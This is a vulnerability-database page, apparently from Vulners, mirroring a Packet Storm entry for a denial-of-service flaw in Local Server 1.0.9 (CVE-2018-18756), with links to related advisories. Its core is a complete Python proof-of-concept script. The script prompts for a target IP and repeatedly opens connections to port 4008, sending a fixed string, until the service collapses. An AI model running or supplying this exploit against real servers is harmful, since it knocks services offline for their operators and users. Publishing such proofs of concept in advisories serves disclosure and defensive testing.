Lucene search
K

Local Server 1.0.9 Denial Of Service

🗓️ 29 Oct 2018 00:00:00Reported by Ihsan SencanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

Local Server 1.0.9 Denial Of Service vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today
LocalServer 1.0.9 - Denial of Service Exploit
29 Oct 201800:00
zdt
CNVD
Local Server Buffer Overflow Vulnerability
20 Nov 201800:00
cnvd
CVE
CVE-2018-18756
16 Nov 201818:00
cve
Cvelist
CVE-2018-18756
16 Nov 201818:00
cvelist
Exploit DB
Local Server 1.0.9 - Denial of Service (PoC)
29 Oct 201800:00
exploitdb
EUVD
EUVD-2018-10472
7 Oct 202500:30
euvd
exploitpack
Local Server 1.0.9 - Denial of Service (PoC)
29 Oct 201800:00
exploitpack
NVD
CVE-2018-18756
16 Nov 201818:29
nvd
Prion
Buffer overflow
16 Nov 201818:29
prion
`# Exploit Title: Local Server 1.0.9 - Denial of Service (PoC)  
# Dork: N/A  
# Date: 2018-10-29  
# Exploit Author: Ihsan Sencan  
# Vendor Homepage: http://www.ujang-rohidin.blogspot.com/  
# Software Link: https://sourceforge.net/projects/local-server/files/latest/download  
# Version: 1.0.9  
# Category: Dos  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: CVE-2018-18756  
  
# POC:   
# 1)  
  
#!/usr/bin/python  
import socket  
  
print """  
\\\|///  
\\ - - //  
( @ @ )  
----oOOo--(_)-oOOo----  
Local Server 1.0.9 Dos  
Ihsan Sencan  
---------------Ooooo----  
( )  
ooooO ) /  
( ) (_/  
\ (  
\_)  
"""  
Ip = raw_input("[Ip]: ")  
Port = 4008 # Default port  
  
d=[]  
c=0  
while 1:  
try:  
d.append(socket.create_connection((Ip,Port)))  
d[c].send("DOOM")  
print "Sie!"  
c+=1  
except socket.error:   
print "+ Done! +"  
raw_input()  
break  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Oct 2018 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.00341
29